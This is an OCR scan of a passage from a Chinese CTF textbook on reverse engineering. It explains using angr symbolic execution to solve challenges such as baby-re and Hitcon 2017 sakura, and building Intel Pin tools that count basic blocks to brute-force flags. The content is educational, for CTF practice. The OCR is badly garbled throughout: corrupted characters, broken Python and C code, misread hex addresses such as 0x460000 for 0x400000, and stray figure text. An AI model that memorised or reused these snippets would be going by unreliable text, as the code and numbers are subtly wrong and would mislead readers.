/AN 类 6 in 人 E 二 上 | | 一 一 /NA 呈 双关 工人 六 生计 Bi 米线 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekd67323c0227d67d8ab4fb04 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 
在 这 个 程序 中 ，fgets 函 数 从 标准 输入 中 获取 了 输入 并 存储 在 rdi 宵 存 器 所 指向 的 内 存 地 址 中 ， 所 以 可 
以 用 同样 方法 Hook 函 数 fgets。 要 实现 Hook 函 数 需要 继承 angr.SimProcedure 这 个 类 并 重 写 run 方 
法 。 我 们 可 以 通过 验证 函数 的 循环 次 数 判断 flag 的 长 度 为 12， 所 以 在 自己 实现 的 函数 中 只 需 往 rdi (第 
一 个 参数 ) 指向 的 内 存 地 址 中 放 12 字 节 输 入 即 可 。 


class my_fgets(angr.Simprocedure): 
def run(self, s,num,f): 
simfd = seLf.state.posix.get_fd(9) 
data, real_size = simfd.read_data(12) 
self.state.memory.store(s, data) 
return 12 
p.hook_symbol('fgets',my_fgets(), replace=True) 


我 们 的 fgets 函 数 先 获取 了 模拟 的 标准 输出 ， 然 后 手动 从 标准 输入 中 读 入 了 12 个 字符 ， 再 把 读 入 的 数 
据 放 入 了 第 一 个 参数 所 指向 的 内 存 地 址 ， 然 后 直接 返回 12 ( 读 入 的 字符 数量 ) 。 


在 完成 两 个 函数 的 设置 后 ， 就 可 以 开始 符号 执行 了 


imgr = p.factory.simulation_manager(state) 
f = simgr.explore(find=0x4008d4, avoid=0x400855) 


在 同一 台 机 器 上 ， 官 方 的 脚本 示例 的 运行 时 间 为 5.274s， 优 化 后 的 脚本 运行 时 间 为 1.641s。 可 以 看 
到 ， 只 是 简单 指定 了 入 口 地 址 ， 然 后 改写 了 两 个 库 函 数 ， 融 可 以 让 angr 的 执行 速度 得 到 很 大 提升 。 在 
实际 的 解 题 过 程 中 ， 如 果 我 们 能 针对 性 地 对 脚本 进行 优化 ， 融 可 以 得 到 很 好 的 效果 。 


PAA de pA (TE: 


ad N= ESH | Ne TE ESI DN bE =b = NN 
进入 CheckSolution 对 数据 进行 检查 ， 见 图 5-7-3。 


CheckSolution 函 数 的 流程 图 见 图 5-7-4。 可 以 看 到 ， 这 个 函数 非常 巨大 ， 并 且 没 法 利用 IDA 的 “F5" 
功能 进行 分 析 。 


我 们 先 把 程序 加 载 起 来 ， 并 将 起 始 地 址 设置 为 main 销 数 开始 的 地 址 。 


p = angr.Project('./baby-re', auto_load.libs=False) 
state = p.factory.blank_state(addr = 0x4025E7) 


同样 ， 我 们 不 希望 引擎 在 printf、fflush 这 两 个 对 程序 关键 算法 的 分 析 上 没有 帮助 的 函数 浪费 时 间 ， 所 
以 让 它们 直接 return。 


p.hook_symboL(C'printf'，angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained']()，repLace=True) 
p.hook_symbol('fflush', angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'](), replace=True) 


为数 scan 侮 次 使 用 “%d ”从 标准 输入 中 获取 一 个 整数 ， 于 是 让 scanf 妆 数 把 数据 在 对 应 参数 指 同 的 
地 址 上 放 4 字 节 的 数据 。 


_ isoc99 scanf("%d", &v4[9]); 
printf("Var[19]: *, &v4[9]); 
fflush(_bss_ start); 
_isoc99 scanf("%d", &v4[10]); 
printf("Var[11]: ", &v4[18]); 
fflush(_ bss start); 
_ isoc99 scanf("%d", &v4[11]); 
printf("Var[12]: "“，&v4[111) ; 
fflush(_bss start); 
_ isoc99 scanf("%d", &v4[12]); 
if ( (unsigned int8)CheckSolution(v4) ) 
printf( 

"The flag is: %c%c%c%C%CRCRCRCECECRCRCRC\N™ , 

v4[8], 

va[1], 

v4[2], 

v4[3]， 

v4[4], 

v4[5]， 

v4[6]， 

v4[7]， 

v4[8]， 

v4[9]， 

v4[19] ， 

v4[11], 

vaA[12]); 
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图 5-7-4 


class my_scanf(angr. SimProcedure) : 
def run(self, fmt,des): 
simfd = self.state.posix.get_fd(0) 
data, real_size = simfd.read_data(4) 
self.state.memory.store(des, data) 


return 1 
p.hook_symbol('__isoc99_scanf ', my_scanf(),replace=True) 


s = p.factory.simulation_manager(state) 
s.explore(find=0x4028E9, avoid=0x402941) 
print(s.found[0] .posix.dumps(0)) 


经 过 一 段 时 间 ， 程 序 确实 可 以 顺利 输出 flag。 但 是 时 间 较 长 ， 我 们 可 以 继续 尝试 对 脚本 进行 优化 。 


在 angr 中 有 许多 官方 文档 中 没有 详细 说 明 的 附加 设置 ， 具 体 信息 在 angr/sim_options.py 文 件 中 ， 
其 中 LAZY IN/ 二 the satisfiability of successor 
states 
”,， 是 捐 不 在 运行 的 时 候 实 时 检查 当前 的 条 件 是 否 能 够 成 功 到 达 目 标 位 置 。 这 样 无 法 避免 一 些 无 解 


的 情况 产生 ， 但 是 可 以 显著 提高 脚本 的 运行 速度 ， 可 以 使 用 以 下 语句 开局 该 选项 : 


tive.options.add(angr.options.LAZY_SOLVES) 


开局 该 选项 前 ， 脚 本 运行 时 间 为 74.102s， 开 局 后 ， 脚 本 运行 时 间 为 8.426s， 关 距 非 营 大 。 在 早期 的 
、 、 NP \- 、 \ A 
版 本 中 ， 该 选项 是 默认 开启 的 ,但 是 新 版 中 默认 关闭 。 在 大 多 数 情 况 下 ， 开 局 这 个 选项 可 以 有 效 
提高 脚本 的 效率 。 


除 此 之 外 ， 还 能 不 能 进行 一 些 优化 呢 ? 通 过 观察 可 以 友 现 ， 程 序 在 前 面 做 的 很 多 操作 都 是 在 一 个 一 个 

获取 输入 ， 这 样 做 相对 来 襄 比 较 耗 时 。 如 果 能 直接 将 输入 放 在 内 他 中， 然后 直接 从 call ee 
eCKSOIUTUON 

的 地 址 (0x4028E0) 开始 执行 ， 也 许可 以 节约 前 面 获取 输入 的 时 间 ， 感 兴趣 的 读者 不 妨 目 行 试验 。 


Angr 模 拟 的 标准 和 输入、 文件 系统 可 以 很 方便 地 全 目 动 创建 符号 变量 。 但 由 于 标准 和 输入、 文件 系统 这 类 
流 对 象 无 法 简单 推断 输入 的 长 度 ， 这 常常 导致 angr 需 要 很 长 时 间 尝 试 不 同 的 长 度 来 求解 ， 而 有 时 由 于 


angr 对 于 scanf 等 特殊 输入 函数 处 理 不 得 当 ， 甚 至 会 提示 无 解 。 所 以 我 们 有 时 需要 在 angr 中 通过 i 
“ 和 全 扩大 瑟 一 二 即 思 2 十 一 一 ， Se My 上 上 oA 
模块 来 手动 构造 输入 。 Claripy 是 一 个 对 z3 等 符号 求解 引擎 的 包装 ， 完 全 可 以 将 其 当成 原生 z3 使 


用 。claripy.BVS0 可 以 直接 创建 符号 变量 ， 其 用 法 类 似 z3 中 的 BitVec， 第 一 个 参数 为 变量 名 ， 第 二 个 
参数 为 位 数 。 于 是 ， 我 们 可 以 通过 以 下 代码 来 创建 用 户 的 输入 : 


p = angr.Project('./baby-re'，auto_Load_Libs = False) 
state = p.factory.blank_state(addr = Qx4028E0) 
flag_chars = [claripy.BVS('flag_%d' % i, 32) for i in range(13)] 


量 放 入 对 应 的 内 存 地 址 ， 为 了 方便 ， 直接 放 入 rsp 指 向 的 内 存 地 址 (最 后 别 志 了 传 


for i in xrange(13): 
state.mem[state.regs.rsp+ixu] .dword = flag_chars[i] 

state.regs.rdi = state.regs.rsp 

s = p.factory.simulation_manager(state) 

< one active ontinnes add(anar ontinnes | A7Y SNL VES) 
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在 手动 设置 符号 变量 后 ， 不 能 直接 Dump 标 准 输入 来 得 到 正确 的 输入 ， 但 是 angr 的 求解 器 直接 提供 了 
一 个 eval 阔 数 ， 可 以 获得 符号 变量 对 应 的 值 : 


flag = ''.join(chr(s.one_found.solver.eval(c)) for c in fLag_chars) 
print(flag) 


过 这 样 操作 ， 我 们 成 功 地 将 脚本 的 运行 时 间 从 8.461s 优 化 到 了 7.933s。 


3. sakura(Hitcon 2017) 


这 道 题 与 前 面 两 题 的 思路 笑 不 多 ， 验 证 输入 后 直接 输出 了 flag。 遗 憾 的 是 ， 直 接 暴力 运行 会 在 消 耗 了 
大 量 时 间 后 ， 因 为 占用 资源 过 大 被 系统 目 动 “ 干 挥 ”。 这 需要 我 们 进行 一 定 优 化 。 同 时 ， 因 为 这 个 验 
证 函数 过 于 巨大 ， 需 要 在 IDA 中 调 大 node 数 的 限制 才能 看 到 流程 图 ， 修 改 方 法 见 图 5-7-5。 


伟 IDA Options 


Disassembly Analysis Cross-references Strings Browser Graph Mise 
General Proximity view 
Use graph view by default 回 Show data references 
回 Enable graph animation [DD Nide library functions 
回 Draw node shadows 器 Unlimited children recursion 
器] Aute fit graph into window [DD Recurse into library functions 
回 Fit window max zoom level 100% 回 Show collapsed nodes 
回 Re-layout graph if nodes overlap Max Parents recursion 
回 Re-layout graph upon screen refresh 
ODTruncate at the right margin 
器 Lock graph layout 


Max rumber of nodes 


Max children recursion 


Max nodes per level 


图 5-7-5 


be Ea bo | EUS EE 
结束 后 ， 进 行 判 断 ， 如 果 不 相等 ， 融 会 把 rbp+var_1E49 赋 值 为 0， 见 图 ?-7-7。 


在 函数 末尾 ，rbp+Vvar_1E49 直 接 作为 返回 值 返 回 到 上 一 级 函数 ， 见 图 5-7-8。 那 么 ， 所 有 对 rbp+var 
_1E49 赋 值 0 的 操作 都 应 该 是 flag 错 误 的 标志 ， 而 这 些 地 方 应 该 让 angr 回 避 . 


日 是 阔 数 中 对 这 个 内 存 地 址 赋值 的 操作 并 不 在 少数 ， 可 以 使 用 idapython 进 行 提取 : 


import idc 
p = Ox850 
end = 9xl19FF5 
addr = [] 
while p <= end: 
asm = idc.GetDisasm(p) 
if asm == 'mov [rbpt+var_1lE49], 0': 
addr .append(p+0x400600) 
p = idc.NextHead(p) 
print(addr) 


虽然 这 个 程序 开局 了 pie 保 护 ， 但 是 在 angr 中 ， 程 序 的 基 址 固定 在 0x400000 处 ， 所 以 在 提取 的 时 候 应 
该 加 上 该 值 。 


最 后 补 上 后 续 步 又 ， 和 直接 运行 : 


avoids = […] # 提取 到 的 数据 
avoids.append(Qx110EC+0x400000) # 没有 成 功 输出 flag 的 位 置 
proj = angr.Project('./sakura') 

state = proj.factory.entry_state() 

simgr = proj.factory.simulation_manager(state) 
simgr.one_active.options.add(angr .options.LAZY_SOLVES) 
simgr.explore(find=(Qx110CA+Qx400000), avoid=avoids) 


一 -一 一 一 
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| 


图 ?5-7-6 


mowv [rbp+var_1E49], 8 


图 5-7-7 





loc 18FD9: 

movzx eax, [rbp+var 1E49] 
rsi, [rbp+var 8] 
rsi, fs:28h 
short locret 196FF4 


"se 


call ”Stack chk fail 


found = simgr.one_found 
text = found.solver.eval(found.memory.load(Qx612040, 460), cast_to=bytes) 


h = hashlib.sha256(text) 
flag = 'hitcon{'+h.hexdigest()+'}' 
print(flag) 


经 过 了 55s 的 短暂 等 待 ， 我 们 的 脚本 成 功 输 出 了 flag。 


与 前 面 几 个 例子 类 似 ， 这 个 脚本 也 有 优化 的 空间 。 比 如 ， 跳 过 前 面 读 取 flag 的 步骤 ， 将 输入 直接 放 在 
内 存 中 : 


state = proj.factory.blank_state(addr = (Ox110BA + Qx460000)) 
simfd = state.posix.get_fd(9) 

data, real_size = simfd.read_data(400) 
state.memory.store(Qx6121E0, data) 


另外 ， 在 这 个 验证 函数 中 调用 sub 110F4、sub 1110E 函 数 的 次 数 非常 多 ( 见 图 5-7-9) ， 而 且 这 些 
图 数 的 逻辑 非 单 简 单 ， 完 全 可 以 手动 分 析 后 ， 蔡 换 成 目 己 实现 的 函数 。 
Rs 
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这 些 函 数 是 程序 自 带 的 函数 ， 没 法 使 用 hook_symbol 进 行 Hook， 幸 运 的 是 angr 支 持 对 特定 的 地 址 进 
行 Hook。 对 于 这 些 简单 的 消 数 ， 我 们 完全 可 以 将 调用 这 些 消 数 的 地 方 Hook 挥 ， 并 换 上 上 自己 实现 的 多 
辑 。 ( 注 : 煞 组 为 调用 这 些 浮 数 的 位 置 。) 


图 5-7-9 


def set_hook(addrs, hooks): 
for i in addrs: 
proj.hook(i,hook=hooks, length=5) 
def my_sub_11146(state) : 
state.regs.rax = state.regs.rdi + 24 
return 


= […] 
set_hook(t, my_sub_11146) 


所 有 call sub_ 11146 的 地 址 都 蔡 换 成 了 目 己 的 函数 ， 而 call 指 令 占 用 了 5 字 节 ， 所 以 第 三 个 参数 length 
为 5。 除 此 之 外 ， 更 简单 的 办 法 是 ， 如 果 第 二 个 阅 数 传 入 的 是 一 个 SimProcedure 类 ， 那 么 ang( 将 把 
这 个 地 址 直接 当成 一 个 销 数 来 hook: 


class MY_sub_11146(angr.Simprocedure): 
def run(self,a): 


proj.hook((Qx480000 + Qx11146),hook = MY_sub_11146()) 


最 终 ， 经 过 优化 的 脚本 只 用 41s 就 可 以 解 出 这 道 逆 向 题 。 


5.7.1.3 angr 小 结 


本 节 介 绍 的 只 是 angr 功 能 中 很 小 的 一 部 分 。 如 果 想 把 angr 熟 练 运用 到 CTF 中 ， 除 了 阅读 angr 本 身 的 文 
档 ， 学 习 各 战队 赛 后 放出 的 脚本 和 官方 样 例 也 是 一 个 不 错 的 选择 。 本 蔬 选 用 的 例题 均 来 自 angr 官 方 样 
例 ， 读 者 可 以 在 angr/angr-doc/examples 下 找到 原 题 并 目 行 研究 。 


5.7.2 二 进 制 插 桩 


揪 桩 (Instrumentation) 是 在 保证 程序 原 有 逻辑 完整 性 的 基础 上 ， 在 程序 中 插入 探 针 ， 通 过 探 针 的 
执行 来 收集 程序 运行 时 信息 的 技术 。 插 桩 往往 用 在 以 下 两 方面 : 


E11 ED 
学 程序 行为 模拟 ， 改 变 程序 的 行为 ， 模 拟 不 支持 的 指令 。 


插 桩 会 向 程序 中 插入 额外 的 代码 。 根 据 实现 插 桩 的 方式 ， 插 桩 可 分 为 两 类 : 源码 插 桩 (Source Code 


Instrumentation) 、 二 进 制 插 桩 (Binary Instrumentation) 。 


= CS ye 
完成 插 桩 后 ， 我 们 需要 重新 编译 链接 ， 以 生成 插 桩 后 的 程序 。 假 设 需要 对 程序 进行 代码 履 兰 率 的 测 
试 ， 则 需要 在 每 个 分 支 后 插入 探 针 来 记录 程序 是 否 执 行 过 某 个 分 支 。 


插 桩 前 、 后 的 代码 如 下 : 


源 程 序 插 桩 后 的 程序 


void foo() { void foo() { 
bool found = faLse; bool found = faLse; 
for (inti = 0; i < 100; ++i) { inst[0] = 1; 
if (i == 56) for (inti = 9; i < 169; ++i) { 
break; if (i == 56] 1{ 
if (i == 20) inst[1] = 1; 
found = true; break; 
3 } 
printf("foo\n"); if (i == 26] { 
} nephodem Ls 
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found = true; 
} 
inst[3] = 1， 
} 
printf("foo\n"); 
inst[4] = 1; 
} 


a a En 
两 种 。 


学 静态 二 进 制 插 桩 : 在 运行 前 插入 额外 的 指令 和 数据 并 生成 修改 后 的 二 进 制 文件 。 
学 动态 二 进 制 插 桩 : 在 程序 运行 时 插入 额外 的 代码 和 数据 ， 不 会 修改 当前 的 可 执行 文件 。 


对 于 x86 染 构 ， 假 设 需要 记录 程序 执行 了 多 少 条 指令 ， 可 以 进行 如 下 操作 : 


PUSH ”EBP 
COUNTER++; 
MOV EBP, ESP 
COUNTER++; 


PUSH EBX 
COUNTER++; 


与 源码 级 插 桩 相 比 ， 二 进 制 插 桩 与 语言 无 天 ， 人 不 需要 程序 的 源码 ， 也 不 需要 重新 编译 链接 程序 ， 它 和 直 
接 对 程序 的 机 器 码 进行 插 柱 ， 因 此 在 逆向 工程 和 实际 漏洞 挖掘 中 一 般 可 以 使 用 二 进 制 插 桩 。 二 进 制 动 
人 态 插 桩 相对 于 二 进 制 静 仿 揪 桩 更 加 强大 ， 可 以 在 程序 运行 时 进行 插 桂 ， 可 以 处 理 动态 生成 的 代码 ， 如 
加 这， 适用 的 场景 更 加 广泛 。 


由 于 CTF 的 逆 同 题 一 般 只 给 出 程序 的 二 进 制 文件 ， 若 将 揪 桩 技术 运用 到 CTF 中 ， 则 需要 使 用 二 进 制 插 
桩 。 


5 3 BI 


Pin 是 Intel 开 发 的 二 进 制 动态 播 桩 引 警 ， 支 持 32/64 位 的 Windows、Linux、Mac、Android， 提 供 了 
丰富 的 C/C++API 来 开发 自己 的 插 桩 工具 pintools。 pintools 十 分 健壮 ， 甚 至 可 以 对 数据 库 、Web 浏 
览 器 等 进行 插 桩 ， 还 可 以 对 插 桩 的 代码 进行 编译 优化 ， 以 减少 插 桩 时 产生 的 额外 开销 。 


5.7.3.1 环境 配置 


Pin 本 身 是 开 箱 即 用 的 ， 由 于 是 Intel 开 发 的 引擎 ， 官 方 的 默认 开 上 友 环 境 可 能 有 些 者 旧 ， 本 节 介 绍 如 何 

配置 一 个 方便 的 、 可 用 的 Pintool 开 发 环境 和 使 用 环境 。 

首先 ， 到 官网 下 载 对 应 平台 的 Pin 环 境 。 人 Re 有 
。 先 将 下 载 完 的 压缩 包 解 讨 到 某 个 目录 ， 会 看 到 目录 下 默认 有 pin.exe 文 件 ， 这 是 32 位 的 。 由 于 pin 

与 架构 相 天 ， 有 32 位 和 64 位 版 本 ， 为 了 使 用 方便 ， 本 文 把 pin 分 为 pin32 和 pin64， 以 便 使 用 。 将 当前 

目录 的 pin.exe 重 命名 为 pin.bak 并 新 建 pin32.bat， 从 中 填 入 如 下 代码 : 


%~dpgNXia32NXbinNXpin.exe %x 


这 残 创 建 好 了 32 位 的 pin.exe 的 快捷 方式 。 


随后 创建 pin64.bat， 代 码 类 似 ， 只 需 把 “ia32” 改 为 “intel64”。 然后 将 当前 目录 加 入 环境 变量 
， 打 开 命令 行 ， 输 入 “pin32” 或 “pin64” 命令 。 若 配置 正常 ， 结 果 见 图 5-7-10。 
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5-7-10 
Pin 中 自 市 的 工具 往往 不 能 满足 CTF 的 插 桩 需求 ， 这 时 需要 使 用 Pin 提 供 的 API 开 上 友 自 己 的 Pintool。 人 在 
source 
\tools\MyPinTool 上 有 目录 下 有 Intel 提 供 的 样 例 代 码 ， 需 要 使 用 Visual Studio 对 Pintool 进 行 开 


发 ， 本 节 使 用 的 环境 为 Visual Studio 2017。 


打开 MyPinTool.vcxproj， 如 果 刀 到 报错 ( 见 图 5-7-11) ， 则 进行 如 下 操作 : 打开 MyPinTool 属 性 ， 
ei yA eb TE md ed = | A A 4 :AYA EE ANIL AY ME 
位 ， 则 加 入 “..Nextras\xed-intel64NncludeN\xed”) ， 见 图 5-7-12。 


区 = 


图 5-7-11 





MyPinTool 属性 页 


Ra: Debg ap EW) 


~\\include\pin;..\.\include\pin\gen;..\InstLib;.\\.\ 


了 le 
\\\extras\crt\include\kernel\uapi 
-\.\.\extras\crt\include\kerneN\uapi\asm-x86 





图 5-7-12 
ED I UUSEE 
MyPinTool 属 性 ， 在 “链接 器 一 高 级 一 映像 具有 安全 异常 处 理 程序 ”中 把 选项 设置 为 “ 否 ”， 见 图 5- 
7-14. 


若 报 错 “ 无 法 解析 的 外 部 符号 _fltused” ( 见 图 5-7-15) ， 则 进行 如 下 操作 : 打开 MyPinTool 属 
Pd Z| ola deol-Te TKe] eo] HU ES EE A 


若 生 成 成 功 ， 则 说 明 编 译 成 功 。 在 生成 的 MyPinTool.dll 所 在 的 目录 打开 命令 行 ， 输 入 如 下 命令 : 


BR 


在 当前 目录 生成 1og.log， 其 中 记录 了 程序 执行 的 基本 块 数目 和 指令 数目 ， 见 图 ?-7-17。 


出 现 图 5-7-18 所 示 的 报错 ， 是 因为 32 位 的 pintool 不 文 持 Windows 10， 需 要 编译 完 后 放 至 Windows 
7 或 Windows 8 虚拟 机 中 运行 。 


图 5-7-13 


RO: FE} 


否 


否 
0x55000000 
是 (IDYNAMICBASE) 


是 UNXCOMPAT 
和 否 


$(OutDin$ (TargetName).lib 


MachineX86 (/MACHINE:X86) 
否 


默认 映像 类 型 
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延迟 签名 

CLR 非 托管 代码 检查 

错误 报告 立即 提示 (/ERRORREPORT:PROMPT) 
部 分 的 对 齐 方式 

保留 Plnvoke 调用 的 最 后 一 个 错误 代码 

映像 具有 安全 异常 处 理 程序 否 (/SAFESEH:NO) 


fitused 


Ue 


fitused 











fltused 


~ 配置 管理 器 (O)-- 


:xedJlib;pinvm.lib:kernel32.lib;stiport-staticlib;m-staticjlib;c-: 
是 UNODEFAULTLIB) 


MyPinTool analysis results: 
Number of instructions: 1965508 
Number of basic blocks: 478369 
Number of threads: 1 


图 5-7-17 





图 5-7-18 


5.7.3.2 Pintool 使 用 


编译 完成 的 Pintool 作 为 一 个 动态 链接 库存 在 : 在 Windows 下 是 DLL， 在 Linux 下 则 是 so。 Pintool 可 
以 直接 局 动 一 个 程序 ( 见 图 ?5-7-19) ， 或 者 附加 到 现 有 的 程序 上 ( 见 图 5-7-20) 。 


图 5-7-19 


图 5-7-20 


5.7.3.3 Pintool 基 本 框架 
本 万 以 Windows 下 Pin 目 市 的 MyPintool 作 为 框架 进行 讲解 。 
MyPintool 的 main 函 数 的 基本 框 以 如 下 : 


int main(int argc，char x*argv[]) { 
// 初始 化 PIN 运行 库 
// 若是 参数 有 -h， 则 输出 帮助 信息 ， 即 调用 Usage 部 数 
if (PIN_Init(argc, argv)) { 
return Usage(); 
} 
string fiLeName = KnobOutputFile.Value();, 
if (!fileName.empty()) { 
out = new std::ofstream(fileName.c_str()); 


} 
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if (KnobCount) 苹 
TRACE_AddInstrumentFunction(Trace, 0); // 注册 在 执行 指令 trace 时 会 执行 的 函 教 
PIN_AddThreadStartFunction(ThreadStart, 0); // 注册 每 个 线程 启动 时 会 执行 的 函数 
PIN_AddFiniFunction(CFini，9); // 注册 程序 结束 时 会 执行 的 函数 

} 

PIN_StartProgram(); // 启动 程序 ， 该 函数 不 会 返回 

return 0; 


} 


Pintool 会 先 执行 Pin_Init 对 Pin 运 行 库 进行 初始 化 ， 若 是 参数 有 -h 或 者 初始 化 失败 报错 ， 则 会 输出 工具 
的 帮助 信息 ， 即 调用 Usage， 见 图 5-7-21。 


随后 Pintool 会 根据 命令 行 输入 的 参数 初始 化 fileName 变 量 。KnobOutputFile 和 KnobCount 的 定义 
见 图 5-7-22。 参 数 为 c 时 ， 会 设置 KnobOutputfile 的 值 ， 默 认为 空 ， 参 数 为 count 时 ， 会 设置 。 
的 值 ， 默 认 值 为 1{。 在 KnobCount 被 设置 的 情况 下 ， 会 注册 3 个 插 桩 函数 ， Se 
运行 被 插 桩 的 程序 (PIN_StartProgram 不 会 返回 ) 。 


下 面 讲解 如 何 揪 桩 。 Pin 提 供 的 插 桩 见 表 5-7-1。 


对 于 指令 级 插 柱 ，Pin 会 在 执行 一 条 新 指令 时 进行 插 桩 ， 换 句 话说 ， 对 于 动态 生成 的 代码 ，Pin 也 能 对 
其 进行 自动 化 的 揪 桩 ， 因 此 可 以 用 Pin 处 理 加 壳 的 程序 。 


轨迹 级 插 桩 可 以 认为 是 基本 块 (base block) 级 的 插 桩 ， 但 是 Pin 定 义 的 基本 块 比 一 般 情况 定义 的 基 
本 块 要 多 。 轨 迹 级 插 桩 会 在 硕 部 的 基本 块 被 调用 ， 若 是 执行 过 程 中 生成 了 新 的 基本 块 (如 分 文 ) ， 则 
会 生成 新 的 轨迹 ， 与 上 述 指令 级 插 柱 有 相同 的 特性 ， 可 以 方便 地 处 理 动态 生成 的 代码 。 


图 5-7-21 


[= 


图 5-7-22 





插 桩 粒度 API 执行 时 机 


指令 级 插 柱 《instuetion i 

轨迹 级 插 桩 (trace》 TRACE_AddInstrumentFunction 

镜像 级 插 桩 (image) IMG_AddInstrumentFunction 

函数 级 插 柱 (routine) RTN_AddinstrumentFunction 执行 一 个 新 函数 时 


镜像 级 插 桩 和 函数 级 插 桩 依赖 符号 信息 ， 需 要 在 调用 PIN_Init 前 调用 Pin_InitSymbols 对 程序 进行 符号 
分 析 。 


Trace 函 数 见 图 5-7-22。TRACE_BblHead 函 数 可 以 获得 当前 轨迹 的 头 部 基本 块 ， 使 用 BBL_Next 向 下 
遍历 所 有 的 基本 块 ， 在 基本 块 执行 前 插入 函数 CountBbl。CountBbl 函 数 见 图 5-7-23。 每 次 执行 基本 


块 前 都 会 执行 该 国 数 ， 从 而 计算 程序 执行 的 所有 指令 数 和 基本 块 数目 。 
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VOID Trace(TRACE trace，VOID *v) { 
// 遍历 trace 的 每 个 基本 块 
for (BBL bbl = TRACE_ BblHead(trace); BBL_Valid(bb1); bbl = BBL_Next(bb1)) { 
// 插入 函数 countBb1， 在 执行 每 个 基本 块 前 都 会 调用 ， 传 递 了 当前 基本 块 的 个 数 给 countBb1 
BBL_InsertCall(bbl, IPOINT_BEFORE, (AFUNPTR)CountBbl, IARG_UINT32, 
BBL_NumIns(bb1), IARG_END); 
} 
} 


图 5-7-22 


VOID CountBbl(UINT32 numInstInBb1) { 
bblCount++; 
insCount += numInstInBb1l; 


5-7-23 
因此 ， 可 以 通过 对 基本 块 的 插 桩 来 计算 程序 执行 的 基本 块 数目 和 指令 数目 ， 得 到 一 个 记录 程序 执行 指 
令 数 的 Pintoo|， 见 图 5-7-24。 
log. log 回 


MyPinTool analysis results: 
Number of instructions: 1965508 
Number of basic blocks: 478369 
Number of threads: 1 

图 5-7-24 


本 节 讲 解 了 Pintool 的 基本 框架 ， 更 多 API 可 以 查阅 Intel Pin 的 文档 : https://software.intel.com/ 
sites 
/landingpage/pintool/docs/97619/Pin/yhtml/index.htm|. 


5.7.3.4 CTF 实 战 : 记录 执行 指令 数 


本 节 介 绍 如 何 使 用 这 个 指令 计数 器 来 完成 对 CTF 间 题 的 求解 。 


CTF 中 的 逆向 题 可 以 抽象 为 给 定 输入 捉 flag， 经 某 种 算法 fi 计算 后 ， 得 到 结果 enc， 青 用 结果 enc 与 程序 
中 内 谋 的 数据 data 进 行 比较 。 若 是 flag， 部 分 字 节 的 改变 只 会 影响 enc 中 的 部 分 字 市 ， a 
分 成 多 上段， 对 输入 进行 爆破 ， 将 算法 值 接 当 作 黑箱 ， 不 对 其 进行 送 同 。 若 要 进行 爆破 ， 需 要 找到 
某 种 方法 来 验证 当前 输入 的 某 部 分 是 人 否 正确 。 考 虑 到 在 data 己 enc 比 较 时 ,不 论 是 手写 循环 比较 还 是 
使 用 memcpy 之 类 的 库 孙 数 ， 各 enc 与 data 的 相同 字 节 越 多 ， 则 执行 的 指令 数 越 多 。 因 此 ， 我 们 可 以 

将 执行 的 指令 数 作 为 标志 ， 验 证 当前 输入 的 某 部 分 是 否 正确 。 


对 于 逆向 题 ， 我 们 可 以 先 用 Pin 验 证 当前 题目 是 否 符 合 上 述 要求 ， 对 于 符合 的 ， 可 以 直接 使 用 Pin 进 行 
爆破 求解 。 


本 三 的 例题 为 Hgame 2018 week4 re1。 由 于 轨迹 级 插 桩 的 开销 小 于 指令 级 插 桩 ， 因 此 我 们 不 对 程 
序 执行 的 指令 数 进行 统计 ， 而 是 对 程序 执行 的 基本 块 的 数目 进行 统计 。 


首先 ， 根 据 样 例 提供 的 MyPintool 新 建 一 个 项 目 并 配置 环境 。 程 序 整 体 框架 见 图 5-7-25。 


int main(int argc, char *#*argvL[ |] ) 
日 { 
if (PIN_Init(argc, argv)) 
S| 1 
return Usage() ; 


} 


string fileName = KnobOutputFile.Value(); 


if (!fileName.empty()) { out = new std::ofstream(fileName.c_str()); } 
// 镜像 加 载 时 调用 

IMG_AddInstrumentFunction(imageLoad, 8); 

// 轨迹 级 trace 

TRACE_AddInstrumentFunction(bblTrace, 98); 

// 程序 结束 时 调用 输出 结果 

PIN AddFiniFunction(Fini, 8); 
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// Start the program, never returns 
PIN_StartProgram( ) ; 


return 08; 


图 5-7-25 
由 于 在 程序 运行 的 过 程 中 ， 我 们 只 关心 程序 本 身 执行 的 基本 块 的 数目 ， 并 不 关心 在 外 部 DLL 中 的 执 
行 ， 因 此 需要 使 用 IMG AddlnstrumentFunction 记 录 程 序 镜 像 的 开始 地 址 和 结束 地 址 ， 见 图 57- 


oo 


oid imageLoad(IMG img, void* V) { 
if (IMG IsMainExecutable(img)) { 
// 记录 镜像 基 址 和 结束 
imageBase = IMG LowAddress(img); 
imageEnd = IMG HighAddress(img); 


图 5-7-26 
随后 使 用 TRACE AddinstrumentFunction 进 行 轨迹 级 插 桩 ， 并 根据 当前 trace 的 地 址 来 决定 是 否 进 行 
插 桩 ， 见 图 5-7-27，。 


桩 沙 数 只 需要 记录 基本 块 个 数 ， 见 图 5-7-28。 最 后 将 记录 的 数据 打 E， 见 图 5-7-29。 这 里 将 结果 输出 
到 stdout 是 为 了 方便 后 续 的 目 动 化 。 


A 4 
VOID bblTrace(TRACE trace, VOID *V) 
{ 
ADDRINT addr = TRACE_Address(trace) ; 
if (addr < imageBase || addr > imageEnd) { 
return; 
} 
// Visit every basic block in the trace 
for (BBL bbl = TRACE BblHead(trace); BBL_Valid(bb1); bbl = BBL_Next(bbl)) 
{ 
// 注册 countBb1 函 数 执行 一 次 基本 块 就 会 调用 一 次 CountBb1 函 数 
BBL_InsertCall(bbl, IPOINT_BEFORE, (AFUNPTR)CountBbl1, IARG_END); 


图 5-7-27 


bblCount++; 


图 5-7-28 
VOID FIni(INT32 code, VOID *v 
{ 


out = &cout 
*out << “Number of basic blocks: " 《< bblCount << end1]1; 


图 5-7-29 


编译 完成 后 ， 我 们 使 用 样 例 程序 进行 测试 ， 工 作 正 常 ， 执 行 的 基本 块 数量 随 着 输入 长 度 的 变化 而 变 
化 ， 见 图 5-7-30。 
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Nunber of basic blocks: | 
5-7-30 


随后 可 以 使 用 Python 统计 执行 的 基本 块 数量 ， 见 图 2?-7-31。 


def calc_bbl(payload ) : 
p= subprocess.Popen(cmd, shell=True, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess .PIPE) 
p.stdin.write(payload+*b"' \n') 
p.stdin.close() 
read_until(p.stdout, b'Number of basic blocks: ') 
